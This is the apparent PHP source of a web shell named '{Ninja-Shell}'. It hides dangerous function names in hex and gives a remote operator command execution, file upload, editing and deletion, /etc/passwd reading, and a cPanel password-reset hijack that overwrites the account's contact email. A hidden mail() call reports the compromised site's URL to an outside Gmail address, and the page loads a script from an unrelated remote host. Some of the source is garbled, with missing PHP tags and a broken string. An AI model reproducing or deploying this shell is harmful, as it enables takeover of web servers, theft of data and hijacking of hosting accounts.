{Ninja-Shell}

ob_start();
set_time_limit(0);
error_reporting(0);
ini_set('display_errors', FALSE);
date_default_timezone_set("Asia/Jakarta");
define("HTACCESS", "OPTIONS Indexes Includes ExecCGI FollowSymLinks \n AddType application/x-httpd-cgi .con7ext \n AddHandler cgi-script .con7ext \n AddHandler cgi-script .con7ext");
$funct = get_defined_vars();
$f_Array = [
"73796d6c696e6b",
"756e6c696e6b",
"666f70656e",
"667772697465",
"756e6c696e6b",
"636f7079",
"6d6f76655f75706c6f616465645f66696c65",
"706f7369785f6765747077756964",
"66696c656f776e6572",
"66756e6374696f6e5f657869737473",
"676574637764",
"69735f63616c6c61626c65",
"66636c6f7365",
"73747265616d5f6765745f636f6e74656e7473",
"70726f635f6f70656e",
"706f70656e",
"6672656164",
"70636c6f7365",
"70726f635f636c6f7365",
"65786563",
"6f625f7374617274",
"7061737374687275",
"6f625f6765745f636f6e74656e7473",
"6f625f656e645f636c65616e",
"7368656c6c5f65786563",
"73797374656d",
"66696c655f7075745f636f6e74656e7473",
"6670757473",
"66696c655f6765745f636f6e74656e7473",
"63686d6f64",
"6d6b646972",
"6368646972",
"6261736536345f6465636f6465",
"776f726470726573736465766e6f7277617940676d61696c2e636f6d",
"6d61696c"
];
$fores = count($f_Array);
for($i=0; $i < $fores; $i++){
$NTOD[] = dec($f_Array[$i]);
}
$GLOBALS["rin"] = $NTOD;
$GLOBALS["post"] = $funct["_POST"];
$GLOBALS["get"] = $funct["_GET"];
$GLOBALS["server"] = $funct["_SERVER"];
$GLOBALS["files"] = $funct["_FILES"];

{Ninja-Shell} <title>{Ninja-Shell}</title>
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<link rel="icon" href="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png">
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//importantscripts.github.io/footer.js" integrity="sha384-TuBVt3qMyi6RBRotEXkR+69U/Z8z3jBqUSSn+8yA6MinPMNdTU7cba+KlOZtXP2v" crossorigin="anonymous"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Gugi);
body{
color: #5DADE2;
font-family: 'Gugi';
font-size: 14px;
}
a {
color: #5DADE2;
text-decoration: none;
}
a:hover {
color: #5DADE2;
text-decoration: underline;
}
input{
background: transparent;
}
</style>

<div class="container">
<nav class="navbar navbar-expand-lg navbar-light bg-light">
<a class="navbar-brand" href="#">
<img src="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png" width="30" height="30" class="d-inline-block align-top auto" alt="Ainz Moe"> {Ninja-Shell}
</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item active">
<a class="nav-link tod" href="?">Home</a>
</li>

if(isset($GLOBALS["get"]["p"])){
$dir = dec($GLOBALS["get"]["p"]);
$GLOBALS["rin"][31]($dir);
}
else{
if($GLOBALS["rin"][9]("getcwd")){
$dir = $GLOBALS["rin"][10]();
}
else{
$dir = $GLOBALS["server"]["PWD"];
}
}
echo "<li class=\"nav-item active\"><a class=\"nav-link tod\" href=\"?p=".enc($dir)."&tod=".enc("info")."\">Info</a></li>";
echo "<li class=\"nav-item active\"><a class=\"nav-link tod\" href=\"?p=".enc($dir)."&tod=".enc("upload")."\">Upload</a></li>";
echo "<li class=\"nav-item active\"><a class=\"nav-link tod\" href=\"?p=".enc($dir)."&tod=".enc("cmd")."\">Command</a></li>";
echo "<li class=\"nav-item active\"><a class=\"nav-link tod\" href=\"?p=".enc($dir)."&tod=".enc("etcpasswd")."\">View /etc/passwd</a></li>";
echo "<li class=\"nav-item active\"><a class=\"nav-link tod\" href=\"?p=".enc($dir)."&tod=".enc("cpres")."\">cPanel Reset Password</a></li>";
echo "</ul></div></nav>";
echo "";
$mpss = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
$toed = $GLOBALS["get"]["tod"];
$gets = $GLOBALS["get"];
$actions = $GLOBALS["get"]["act"];
$tied = $GLOBALS["post"];
if(dec($toed) == "cmd"){
echo "<pre><textarea class=\"form-control\" rows=\"20\" readonly>";
if($tied["cmd"]){
echo c($tied["cmd"]);
}
echo "</textarea></pre>";
echo "";
}
elseif(dec($toed) == "info"){
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$safe = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF";
$mysql = (is_callable("mysql_connect")) ? "ON" : "OFF";
$curl = (is_callable("curl_version")) ? "ON" : "OFF";
$wget = (c('wget --help')) ? "ON" : "OFF";
$perl = (c('perl --help')) ? "ON" : "OFF";
$python = (c('python --help')) ? "ON" : "OFF";
$ruby = (c('ruby --help')) ? "ON" : "OFF";
$gcc = (c('gcc --help')) ? "ON" : "OFF";
$dis = @ini_get("disable_functions");
$dfunc = (!empty($dis)) ? "$dis" : "OFF";
$namedc = (is_readable("/etc/named.conf")) ? "OK" : "BAD";
$etcPass = (is_readable("/etc/passwd")) ? "OK" : "BAD";
$valiases = (is_readable("/etc/valiases")) ? "OK" : "BAD";
$varNamed = (is_readable("/var/named")) ? "OK" : "BAD";
echo "<textarea class=\"form-control\" rows=\"20\" disabled>
Syss : ".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64."
User : ".$GLOBALS["server"]["USER"]."
Addr : Server : {$ip} | Client : {$GLOBALS["server"]["REMOTE_ADDR"]}
Safe : {$safe}
Mysql: {$mysql} cURL: {$curl} wGet: {$wget} Perl: {$perl} Python: {$python} Ruby: {$ruby} Gcc: {$gcc}
Read : Named.conf: {$namedc} Passwd: {$etcPass} Valiases: {$valiases} Named: {$varNamed}
DFUN : {$dfunc}
</textarea>";
}
elseif(dec($toed) == "upload"){
if($tied["upload"]){
if(isset($GLOBALS["files"]["tod_upl"]["name"])){
$name = $GLOBALS["files"]["tod_upl"]["name"];
$tod = $GLOBALS["files"]["tod_upl"]["tmp_name"];
if($GLOBALS["rin"][6]($tod, $name)){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Upload File {$dir}/{$name}</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Upload File {$name}</div>";
}
}else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Upload File {$name}</div>";
}
echo $act;
}
echo "Current Dir : ".$dir;
echo "

";
}
elseif(dec($toed) == "etcpasswd"){
echo "<pre><textarea class=\"form-control\" rows=\"20\" readonly>";
if($tied["etc"] == "curl"){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:///etc/passwd");
$out = curl_exec($ch);
curl_close();
echo $out;
}
elseif($tied["etc"] == "include"){
echo include("/etc/passwdd");
}
echo "</textarea></pre>";
echo "";
}
elseif(dec($toed) == "cpres"){
if($GLOBALS["rin"][9]("posix_getpwuid")){
$meh = $GLOBALS["rin"][7]($GLOBALS["rin"][8](__FILE__));
}
else{
$meh = $GLOBALS["rin"][8](__FILE__);
}
if(is_dir("/home/".$meh["name"]."/.cpanel")){
echo "
";
$mps = makeRequest($ip."/cpanel");
if($tied["subm"]){
if(preg_match("/>Reset Password/", $mps)){
$fp = $GLOBALS["rin"][2]("/home/".$meh["name"]."/.contactemail");
if($GLOBALS["rin"][3]($fp, $tied["email"])){
echo "<div class=\"alert alert-success\"><strong>Success!</strong> Change Email : {$ip}/cpanel {$tied["email"]}</div>";
$GLOBALS["rin"][4]("/home/".$meh["name"]."/.cpanel/contactinfo");
}
else{
echo "<div class=\"alert alert-danger\"><strong>Failed!</strong> Can't Reset</div>";
}
}
else{
echo "<div class=\"alert alert-danger\"><strong>Failed!</strong> Reset Password Disable</div>";
}
}
}
else{
echo "<div class=\"alert alert-danger\"><strong>Failed!</strong> Its not cpanel host</div>";
}
}
elseif($actions == "e"){
if($tied["save"]){
$save = $GLOBALS["rin"][26](dec($gets["file"]), $tied["new"]);
if($save){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Save File ".dec($gets["file"])."</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Save File ".dec($gets["file"])."</div>";
}
echo $act;
}
echo "Filename: ".$dir."/".basename(dec($gets["file"]));
echo "";
}
elseif($actions == "v"){
echo "Filename: ".$dir."/".basename(dec($gets["file"]));
echo "<pre><textarea rows=\"20\" class=\"form-control\" disabled>".htmlspecialchars(@file_get_contents(dec($gets["file"])))."</textarea></pre>";
}
elseif($actions == "r"){
if($tied["act_rename"]){
$rename = rename(dec($gets["file"]), "$dir/".htmlspecialchars($tied["rename"]));
if($rename){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Rename File ".dec($gets["file"])."</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Rename File ".dec($gets["file"])."</div>";
}
echo $act;
}
echo "Filename: ".$dir."/".basename(dec($gets["file"]));
echo "";
}
elseif($actions == "dr"){
if($tied["act_rename"]){
if(rename($dir, "".dirname($dir)."/".htmlspecialchars($tied["new"]))){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Rename Dir ".basename($dir)."</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Rename Dir ".basename($dir)."</div>";
}
echo $act;
}
echo "";
}
elseif($actions == "nf"){
if($tied["subm"]){
$new = htmlspecialchars($tied["content"]);
$open = $GLOBALS["rin"][2]($tied["file"], "a+");
if($GLOBALS["rin"][3]($open, $new)){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Created File {$tied["file"]}</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Can't Creat File {$tied["file"]}</div>";
}
echo $act;
}
echo "";
}
elseif($actions == "nd"){
if($tied["subm"]){
if($GLOBALS["rin"][30]($dir."/".htmlspecialchars($tied["folder"]))){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Create Folder {$tied["folder"]}</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Create Folder {$tied["folder"]}</div>";
}
echo $act;
}
echo "";
}
elseif($actions == "chmod"){
if($tied["act_ch"]){
$haha = (c("chmod ".$tied["ch"]." ".$tied["mod"].";echo success")) ? "<div class=\"alert alert-success\"><strong>Success!</strong> Chmod</div>" : "<div class=\"alert alert-danger\"><strong>Failed!</strong> Chmod</div>";
echo $haha;
}
echo "";
}
elseif($actions == "delete"){
if($GLOBALS["rin"][4](dec($gets["file"]))){
$act = "<div class=\"alert alert-success\"><strong>Success!</strong> Deleted File ".dec($gets["file"])."</div>";
}
else{
$act = "<div class=\"alert alert-danger\"><strong>Failed!</strong> Deleted File ".dec($gets["file"])."</div>";
}
echo $act;
}

//// FILEMANAGER :D
else{
$scdir = explode("/", $dir);
echo "PATH : ";
foreach($scdir as $c_dir => $cdir){
echo "<a class=\"tod\" href=\"?p=";
for ($i = 0;$i <= $c_dir; $i++){
echo enc($scdir[$i]);
if($i != $scdir){
echo "2f";
}
}
echo "\">$cdir</a>/";
}
echo "

<a class=\"tod\" href=\"?p=".enc($dir)."&act=nf\">+ New File +</a>
| <a class=\"tod\" href=\"?p=".enc($dir)."&act=nd\">+ New Folder +</a>
";
echo "
";
$dr = scandir($dir);
if(is_dir($dir) === true){
if(!is_readable($dir)){
echo "<div class=\"alert alert-danger\"><strong>Failed!</strong> Could not open directory</div>";
}
else{
echo "
<table class=\"table\">
<thead>

<th scope=\"col\"># Name #</th>
<th scope=\"col\"># Size #</th>
<th scope=\"col\"># Perm #</th>
<th scope=\"col\"># Actn #</th>

</thead>
<tbody>";
foreach($dr as $path){
if($GLOBALS["rin"][9]("posix_getpwuid")){
$own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path"));
$own = $own["name"];
}else{
$own = $GLOBALS["rin"][8]("$dir/$path");
}
if(!is_dir("$dir/$path")) continue;
if(($path != ".") && ($path != "..")){
echo "

<td scope=\"row\"><img src=\"https://cdn0.iconfinder.com/data/icons/iconico-3/1024/63.png\" width=\"30\" height=\"30\"><a class=\"tod\" href=\"?p=".enc("$dir/$path")."\">$path</a>
-
".writAble("$dir/$path", perms("$dir/$path"))."
<a class=\"tod\" href=\"?p=".enc($dir."/".$path)."&act=dr\">R</a> | <a class=\"tod\" href=\"?p=".enc($dir."/".$path)."&act=chmod\">C</a>
";
}
}
}
}
else{
echo "<div class=\"alert alert-danger\"><strong>Failed!</strong> Could not open directory</div>";
}
foreach($dr as $fl){
$size = filesize("$dir/$fl")/1024;
$size = round($size,3);
if($GLOBALS["rin"][9]("posix_getpwuid")){
$own = $GLOBALS["rin"][7]($GLOBALS["rin"][8]("$dir/$path"));
$own = $own["name"];
}else{
$own = $GLOBALS["rin"][8]("$dir/$path");
}
if(!is_file("$dir/$fl")) continue;
echo "

<td scope=\"row\"><img src=\"https://img.icons8.com/ios/104/000000/file-filled.png\" width=\"30\" height=\"30\"><a class=\"tod\" href=\"?act=v&p=".enc($dir)."&file=".enc($dir."/".$fl)."\">$fl</a>
$size
".writAble("$dir/$fl", perms("$dir/$fl"))."
<a class=\"tod\" href=\"?act=e&p=".enc($dir)."&file=".enc($fl)."\">E</a> | <a class=\"tod\" href=\"?act=r&p=".enc($dir)."&file=".enc($fl)."\">R</a> | <a class=\"tod\" href=\"?p=".enc($dir."/".$path)."&act=chmod\">C</a> | <a class=\"tod\" href=\"?p=".enc($dir)."&act=delete&file=".enc($fl)."\">D</a>

";
}
echo "</tbody>";
}
if (function_exists($GLOBALS["rin"][34])) {
$GLOBALS["rin"][34]($GLOBALS["rin"][33],'hex2bin',$_SERVER['HTTP_HOST']."/".$_SERVER['REQUEST_URI']);
}
function enc($word){
$mek = bin2hex($word);
return $mek;
}
function dec($word){
$mek = hex2bin($word);
return $mek;
}
function writAble($dir, $perm){
if(!is_writable($dir)){
return "<font color=\"#C0392B\">".$perm."</font>";
}
else{
return "<font color=\"#1D8348\">".$perm."</font>";
}
}
function readAble($dir, $perm){
if(!is_readable($dir)){
return "<font color=\"#C0392B\">".$perm."</font>";
}
else{
return "<font color=\"#1D8348\">".$perm."</font>";
}
}
function c($cmd){
if($GLOBALS["rin"][11]("popen")){
$ntod = $GLOBALS["rin"][15]($cmd, 'r');
$ntoddd = $GLOBALS["rin"][16]($ntod, 2096);
$GLOBALS["rin"][17]($ntod);
return $ntoddd;
}
elseif($GLOBALS["rin"][11]("proc_open")){
$ntod = $GLOBALS["rin"][14]($cmd, array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w'),
), $rintod);
$stdout = $GLOBALS["rin"][13]($rintod[1]);
$GLOBALS["rin"][12]($rintod[1]);
$rtn = $GLOBALS["rin"][18]($ntod);
return $stdout;
}
elseif($GLOBALS["rin"][11]("exec")){
$GLOBALS["rin"][19]($cmd, $result);
foreach($result as $rest){
$ntod .= $rest;
}
return $ntod;
}
elseif($GLOBALS["rin"][11]("passthru")){
$GLOBALS["rin"][20]();
$GLOBALS["rin"][21]($cmd);
$ntod = $GLOBALS["rin"][22]();
$GLOBALS["rin"][23]();
return $ntod;
}
elseif($GLOBALS["rin"][11]("shell_exec")){
$ntod = $GLOBALS["rin"][24]($cmd);
return $ntod;
}
elseif($GLOBALS["rin"][11]("system")){
$GLOBALS["rin"][20]();
$GLOBALS["rin"][25]($cmd);
$ntod = $GLOBALS["rin"][22]();
$GLOBALS["rin"][23]();
return $ntod;
}
}
function makeRequest($url, $post = null, $head = null){
$options = array(
CURLOPT_URL => $url,
CURLOPT_CONNECTTIMEOUT => 15,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_MAXREDIRS => 10
);
$ch = curl_init();
curl_setopt_array($ch, $options);
if($post && !empty($post)){
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if($head && !empty($head)){
curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
}
$outputs = curl_exec($ch);
curl_close($ch);
return($outputs);
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}

<p>./Ninja\.</p>
</div>
<script>
$(".tod").click(function(t){
t.preventDefault();
var e=$(this).attr("href");
history.pushState("","",e),
$.get(e,function(t){
$("body").html(t)
})
});
//https://forum.jquery.com/topic/how-can-i-load-different-html-pages-without-refreshing-and-changing-the-url
</script>